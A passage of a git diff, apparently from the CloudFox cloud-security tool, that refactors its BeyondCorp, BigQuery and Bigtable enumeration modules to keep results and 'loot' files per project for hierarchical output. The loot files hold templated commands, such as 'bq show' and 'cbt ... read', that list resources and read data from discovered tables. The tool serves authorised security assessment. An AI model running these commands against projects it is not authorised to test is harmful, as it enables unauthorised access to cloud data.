fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) + lootFile.Contents += fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) } - m.LootMap["beyondcorp-details"].Contents += "\n" + lootFile.Contents += "\n" } func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BeyondCorpModule) getConnectorsHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Resource Role", "Resource Principal", "Public"} +} - // App Connectors table (one row per IAM binding member) - if len(m.AppConnectors) > 0 { - header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Role", "Member", "Public"} - var body [][]string - for _, connector := range m.AppConnectors { - publicAccess := "No" - if connector.PublicAccess { - publicAccess = "Yes" +func (m *BeyondCorpModule) getConnectionsHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Resource Role", "Resource Principal", "Public"} +} + +func (m *BeyondCorpModule) connectorsToTableBody(connectors []beyondcorpservice.AppConnectorInfo) [][]string { + var body [][]string + for _, connector := range connectors { + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } } + } + } + return body +} + +func (m *BeyondCorpModule) connectionsToTableBody(connections []beyondcorpservice.AppConnectionInfo) [][]string { + var body [][]string + for _, conn := range connections { + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } - // If no IAM bindings, still show the connector - if len(connector.IAMBindings) == 0 { - body = append(body, []string{ - m.GetProjectName(connector.ProjectID), - connector.ProjectID, - connector.Name, - connector.Location, - connector.State, - connector.PrincipalInfo, - "-", - "-", - publicAccess, - }) - } else { - // One row per member per role - for _, binding := range connector.IAMBindings { - for _, member := range binding.Members { - body = append(body, []string{ - m.GetProjectName(connector.ProjectID), - connector.ProjectID, - connector.Name, - connector.Location, - connector.State, - connector.PrincipalInfo, - binding.Role, - member, - publicAccess, - }) - } + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) } } } - tables = append(tables, internal.TableFile{ + } + return body +} + +func (m *BeyondCorpModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if connectors, ok := m.ProjectAppConnectors[projectID]; ok && len(connectors) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "beyondcorp-connectors", - Header: header, - Body: body, + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(connectors), }) } - // App Connections table (one row per IAM binding member) - if len(m.AppConnections) > 0 { - header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Role", "Member", "Public"} - var body [][]string - for _, conn := range m.AppConnections { - publicAccess := "No" - if conn.PublicAccess { - publicAccess = "Yes" - } + if connections, ok := m.ProjectAppConnections[projectID]; ok && len(connections) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "beyondcorp-connections", + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(connections), + }) + } + + return tableFiles +} + +func (m *BeyondCorpModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectAppConnectors { + projectIDs[projectID] = true + } + for projectID := range m.ProjectAppConnections { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) - // If no IAM bindings, still show the connection - if len(conn.IAMBindings) == 0 { - body = append(body, []string{ - m.GetProjectName(conn.ProjectID), - conn.ProjectID, - conn.Name, - conn.Location, - conn.State, - conn.ApplicationEndpoint, - conn.Gateway, - "-", - "-", - publicAccess, - }) - } else { - // One row per member per role - for _, binding := range conn.IAMBindings { - for _, member := range binding.Members { - body = append(body, []string{ - m.GetProjectName(conn.ProjectID), - conn.ProjectID, - conn.Name, - conn.Location, - conn.State, - conn.ApplicationEndpoint, - conn.Gateway, - binding.Role, - member, - publicAccess, - }) - } + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) } } } + + outputData.ProjectLevelData[projectID] = BeyondCorpOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BEYONDCORP_MODULE_NAME) + } +} + +func (m *BeyondCorpModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allConnectors := m.getAllConnectors() + allConnections := m.getAllConnections() + + var tables []internal.TableFile + + if len(allConnectors) > 0 { + tables = append(tables, internal.TableFile{ + Name: "beyondcorp-connectors", + Header: m.getConnectorsHeader(), + Body: m.connectorsToTableBody(allConnectors), + }) + } + + if len(allConnections) > 0 { tables = append(tables, internal.TableFile{ Name: "beyondcorp-connections", - Header: header, - Body: body, + Header: m.getConnectionsHeader(), + Body: m.connectionsToTableBody(allConnections), }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index c5cf3dfc..0023d6e1 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -36,11 +36,11 @@ Features: type BigQueryModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Datasets []BigQueryService.BigqueryDataset - Tables []BigQueryService.BigqueryTable - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Per-project data for hierarchical output + ProjectDatasets map[string][]BigQueryService.BigqueryDataset + ProjectTables map[string][]BigQueryService.BigqueryTable + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -66,15 +66,12 @@ func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { // Create module instance module := &BigQueryModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Datasets: []BigQueryService.BigqueryDataset{}, - Tables: []BigQueryService.BigqueryTable{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDatasets: make(map[string][]BigQueryService.BigqueryDataset), + ProjectTables: make(map[string][]BigQueryService.BigqueryTable), + LootMap: make(map[string]map[string]*internal.LootFile), } - // Initialize loot files - module.initializeLootFiles() - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -86,18 +83,40 @@ func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + // Get all data for stats + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() + // Check results - if len(m.Datasets) == 0 && len(m.Tables) == 0 { + if len(allDatasets) == 0 && len(allTables) == 0 { logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(m.Datasets), len(m.Tables)), globals.GCP_BIGQUERY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(allDatasets), len(allTables)), globals.GCP_BIGQUERY_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } +// getAllDatasets returns all datasets from all projects +func (m *BigQueryModule) getAllDatasets() []BigQueryService.BigqueryDataset { + var all []BigQueryService.BigqueryDataset + for _, datasets := range m.ProjectDatasets { + all = append(all, datasets...) + } + return all +} + +// getAllTables returns all tables from all projects +func (m *BigQueryModule) getAllTables() []BigQueryService.BigqueryTable { + var all []BigQueryService.BigqueryTable + for _, tables := range m.ProjectTables { + all = append(all, tables...) + } + return all +} + // ------------------------------ // Project Processor (called concurrently for each project) // ------------------------------ @@ -116,17 +135,26 @@ func (m *BigQueryModule) processProject(ctx context.Context, projectID string, l return } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Datasets = append(m.Datasets, result.Datasets...) - m.Tables = append(m.Tables, result.Tables...) + m.ProjectDatasets[projectID] = result.Datasets + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } // Generate loot for each dataset and table for _, dataset := range result.Datasets { - m.addDatasetToLoot(dataset) + m.addDatasetToLoot(projectID, dataset) } for _, table := range result.Tables { - m.addTableToLoot(table) + m.addTableToLoot(projectID, table) } m.mu.Unlock() @@ -138,16 +166,14 @@ func (m *BigQueryModule) processProject(ctx context.Context, projectID string, l // ------------------------------ // Loot File Management // ------------------------------ -func (m *BigQueryModule) initializeLootFiles() { - m.LootMap["bigquery-commands"] = &internal.LootFile{ - Name: "bigquery-commands", - Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *BigQueryModule) addDatasetToLoot(projectID string, dataset BigQueryService.BigqueryDataset) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { + return } -} -func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { // All commands for this dataset - m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Dataset: %s (Project: %s, Location: %s)\n"+ "# Show dataset info\n"+ "bq show --project_id=%s %s\n"+ @@ -161,9 +187,14 @@ func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDatase ) } -func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { +func (m *BigQueryModule) addTableToLoot(projectID string, table BigQueryService.BigqueryTable) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { + return + } + // Table info and query commands - m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Table: %s.%s (Project: %s)\n"+ "# Type: %s, Size: %d bytes, Rows: %d\n"+ "# Show table schema:\n"+ @@ -185,7 +216,7 @@ func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { if len(viewQuery) > 200 { viewQuery = viewQuery[:200] + "..." } - m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# VIEW DEFINITION: %s.%s\n"+ "# Legacy SQL: %v\n"+ "# Query:\n"+ @@ -201,38 +232,64 @@ func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { // Output Generation // ------------------------------ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Dataset table with access columns (one row per access entry) - datasetHeader := []string{ + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getDatasetHeader returns the dataset table header +func (m *BigQueryModule) getDatasetHeader() []string { + return []string{ "Project ID", "Project Name", "Dataset ID", "Location", "Public", "Encryption", - "Role", - "Member Type", - "Member", + "Resource Role", + "Principal Type", + "Resource Principal", } +} - var datasetBody [][]string +// getTableHeader returns the table table header +func (m *BigQueryModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Rows", + "Public", + "Resource Role", + "Resource Principal", + } +} + +// datasetsToTableBody converts datasets to table body rows +func (m *BigQueryModule) datasetsToTableBody(datasets []BigQueryService.BigqueryDataset) ([][]string, int) { + var body [][]string publicCount := 0 - for _, dataset := range m.Datasets { + for _, dataset := range datasets { publicStatus := "" if dataset.IsPublic { publicStatus = dataset.PublicAccess publicCount++ } - // One row per access entry if len(dataset.AccessEntries) > 0 { for _, entry := range dataset.AccessEntries { memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) role := entry.Role - // Special access types (View, Routine, Dataset) may not have explicit roles if role == "" { - role = "READER" // Views/Routines/Datasets grant implicit read access + role = "READER" } - datasetBody = append(datasetBody, []string{ + body = append(body, []string{ dataset.ProjectID, m.GetProjectName(dataset.ProjectID), dataset.DatasetID, @@ -245,8 +302,7 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger }) } } else { - // Dataset with no access entries - datasetBody = append(datasetBody, []string{ + body = append(body, []string{ dataset.ProjectID, m.GetProjectName(dataset.ProjectID), dataset.DatasetID, @@ -259,33 +315,20 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger }) } } + return body, publicCount +} - // Table table with security columns (one row per IAM binding member) - tableHeader := []string{ - "Project ID", - "Project Name", - "Dataset ID", - "Table ID", - "Type", - "Encryption", - "Rows", - "Public", - "Role", - "Member", - } - - var tableBody [][]string - publicTableCount := 0 - for _, table := range m.Tables { +// tablesToTableBody converts tables to table body rows +func (m *BigQueryModule) tablesToTableBody(tables []BigQueryService.BigqueryTable) [][]string { + var body [][]string + for _, table := range tables { publicStatus := "" if table.IsPublic { publicStatus = table.PublicAccess - publicTableCount++ } - // If no IAM bindings, still show the table if len(table.IAMBindings) == 0 { - tableBody = append(tableBody, []string{ + body = append(body, []string{ table.ProjectID, m.GetProjectName(table.ProjectID), table.DatasetID, @@ -298,10 +341,9 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger "-", }) } else { - // One row per member per role for _, binding := range table.IAMBindings { for _, member := range binding.Members { - tableBody = append(tableBody, []string{ + body = append(body, []string{ table.ProjectID, m.GetProjectName(table.ProjectID), table.DatasetID, @@ -317,27 +359,93 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger } } } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *BigQueryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectDatasets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectTables { + projectsWithData[projectID] = true + } + + totalPublicCount := 0 + for projectID := range projectsWithData { + datasets := m.ProjectDatasets[projectID] + tables := m.ProjectTables[projectID] + + datasetBody, publicCount := m.datasetsToTableBody(datasets) + totalPublicCount += publicCount + tableBody := m.tablesToTableBody(tables) + + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryOutput{Table: tableFiles, Loot: lootFiles} + } + + if totalPublicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", totalPublicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BigQueryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() - // Collect loot files + datasetBody, publicCount := m.datasetsToTableBody(allDatasets) + tableBody := m.tablesToTableBody(allTables) + + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - // Build tables list - tables := []internal.TableFile{ - { - Name: "bigquery-datasets", - Header: datasetHeader, - Body: datasetBody, - }, - { - Name: "bigquery-tables", - Header: tableHeader, - Body: tableBody, - }, + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, } if publicCount > 0 { @@ -345,11 +453,10 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger } output := BigQueryOutput{ - Table: tables, + Table: tableFiles, Loot: lootFiles, } - // Write output using HandleOutputSmart with scope support scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(id) @@ -360,9 +467,9 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", + m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index 0c0bb9e5..14f661fb 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -29,10 +29,10 @@ Features: type BigtableModule struct { gcpinternal.BaseGCPModule - Instances []bigtableservice.BigtableInstanceInfo - Tables []bigtableservice.BigtableTableInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectInstances map[string][]bigtableservice.BigtableInstanceInfo // projectID -> instances + ProjectTables map[string][]bigtableservice.BigtableTableInfo // projectID -> tables + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type BigtableOutput struct { @@ -50,19 +50,21 @@ func runGCPBigtableCommand(cmd *cobra.Command, args []string) { } module := &BigtableModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Instances: []bigtableservice.BigtableInstanceInfo{}, - Tables: []bigtableservice.BigtableTableInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]bigtableservice.BigtableInstanceInfo), + ProjectTables: make(map[string][]bigtableservice.BigtableTableInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) - if len(m.Instances) == 0 { + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + if len(allInstances) == 0 { logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) return } @@ -70,19 +72,19 @@ func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { // Count public instances and tables publicInstanceCount := 0 publicTableCount := 0 - for _, instance := range m.Instances { + for _, instance := range allInstances { if instance.PublicAccess { publicInstanceCount++ } } - for _, table := range m.Tables { + for _, table := range allTables { if table.PublicAccess { publicTableCount++ } } logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", - len(m.Instances), len(m.Tables)), globals.GCP_BIGTABLE_MODULE_NAME) + len(allInstances), len(allTables)), globals.GCP_BIGTABLE_MODULE_NAME) if publicInstanceCount > 0 || publicTableCount > 0 { logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", @@ -92,6 +94,22 @@ func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +func (m *BigtableModule) getAllInstances() []bigtableservice.BigtableInstanceInfo { + var all []bigtableservice.BigtableInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *BigtableModule) getAllTables() []bigtableservice.BigtableTableInfo { + var all []bigtableservice.BigtableTableInfo + for _, tables := range m.ProjectTables { + all = append(all, tables...) + } + return all +} + func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) @@ -107,31 +125,39 @@ func (m *BigtableModule) processProject(ctx context.Context, projectID string, l } m.mu.Lock() - m.Instances = append(m.Instances, result.Instances...) - m.Tables = append(m.Tables, result.Tables...) + m.ProjectInstances[projectID] = result.Instances + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", + } + } + for _, instance := range result.Instances { - m.addInstanceToLoot(instance) + m.addInstanceToLoot(projectID, instance) } for _, table := range result.Tables { - m.addTableToLoot(table) + m.addTableToLoot(projectID, table) } m.mu.Unlock() } -func (m *BigtableModule) initializeLootFiles() { - m.LootMap["bigtable-commands"] = &internal.LootFile{ - Name: "bigtable-commands", - Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", +func (m *BigtableModule) addInstanceToLoot(projectID string, instance bigtableservice.BigtableInstanceInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return } -} -func (m *BigtableModule) addInstanceToLoot(instance bigtableservice.BigtableInstanceInfo) { var clusterNames []string for _, cluster := range instance.Clusters { clusterNames = append(clusterNames, cluster.Name) } - m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Instance: %s (%s)\n"+ "# Type: %s, State: %s\n"+ "# Clusters: %s\n"+ @@ -143,8 +169,12 @@ func (m *BigtableModule) addInstanceToLoot(instance bigtableservice.BigtableInst ) } -func (m *BigtableModule) addTableToLoot(table bigtableservice.BigtableTableInfo) { - m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( +func (m *BigtableModule) addTableToLoot(projectID string, table bigtableservice.BigtableTableInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( "# Table: %s (Instance: %s)\n"+ "cbt -project %s -instance %s read %s count=10\n\n", table.Name, table.InstanceName, @@ -153,19 +183,29 @@ func (m *BigtableModule) addTableToLoot(table bigtableservice.BigtableTableInfo) } func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - // Instances table (one row per IAM binding member) - instanceHeader := []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Role", "Member", "Public"} +func (m *BigtableModule) getInstanceHeader() []string { + return []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Resource Role", "Resource Principal", "Public"} +} - var instanceBody [][]string - for _, instance := range m.Instances { +func (m *BigtableModule) getTableHeader() []string { + return []string{"Project Name", "Project ID", "Instance", "Table", "Resource Role", "Resource Principal", "Public"} +} + +func (m *BigtableModule) instancesToTableBody(instances []bigtableservice.BigtableInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { publicAccess := "No" if instance.PublicAccess { publicAccess = "Yes" } - // Build cluster info string: "name (location)" for each cluster var clusterDetails []string for _, cluster := range instance.Clusters { clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) @@ -175,9 +215,8 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger clusters = strings.Join(clusterDetails, ", ") } - // If no IAM bindings, still show the instance if len(instance.IAMBindings) == 0 { - instanceBody = append(instanceBody, []string{ + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, @@ -190,10 +229,9 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger publicAccess, }) } else { - // One row per member per role for _, binding := range instance.IAMBindings { for _, member := range binding.Members { - instanceBody = append(instanceBody, []string{ + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, @@ -209,28 +247,19 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger } } } + return body +} - if len(instanceBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "bigtable-instances", - Header: instanceHeader, - Body: instanceBody, - }) - } - - // Tables table (one row per IAM binding member) - tableHeader := []string{"Project Name", "Project ID", "Instance", "Table", "Role", "Member", "Public"} - - var tableBody [][]string - for _, table := range m.Tables { +func (m *BigtableModule) tablesToTableBody(tables []bigtableservice.BigtableTableInfo) [][]string { + var body [][]string + for _, table := range tables { publicAccess := "No" if table.PublicAccess { publicAccess = "Yes" } - // If no IAM bindings, still show the table if len(table.IAMBindings) == 0 { - tableBody = append(tableBody, []string{ + body = append(body, []string{ m.GetProjectName(table.ProjectID), table.ProjectID, table.InstanceName, @@ -240,10 +269,9 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger publicAccess, }) } else { - // One row per member per role for _, binding := range table.IAMBindings { for _, member := range binding.Members { - tableBody = append(tableBody, []string{ + body = append(body, []string{ m.GetProjectName(table.ProjectID), table.ProjectID, table.InstanceName, @@ -256,24 +284,90 @@ func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger } } } + return body +} + +func (m *BigtableModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if tables, ok := m.ProjectTables[projectID]; ok && len(tables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-tables", + Header: m.getTableHeader(), + Body: m.tablesToTableBody(tables), + }) + } + + return tableFiles +} + +func (m *BigtableModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigtableOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) +} + +func (m *BigtableModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + var tableFiles []internal.TableFile + + if len(allInstances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "bigtable-instances", + Header: m.getInstanceHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } - if len(tableBody) > 0 { - tables = append(tables, internal.TableFile{ + if len(allTables) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "bigtable-tables", - Header: tableHeader, - Body: tableBody, + Header: m.getTableHeader(), + Body: m.tablesToTableBody(allTables), }) } var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != 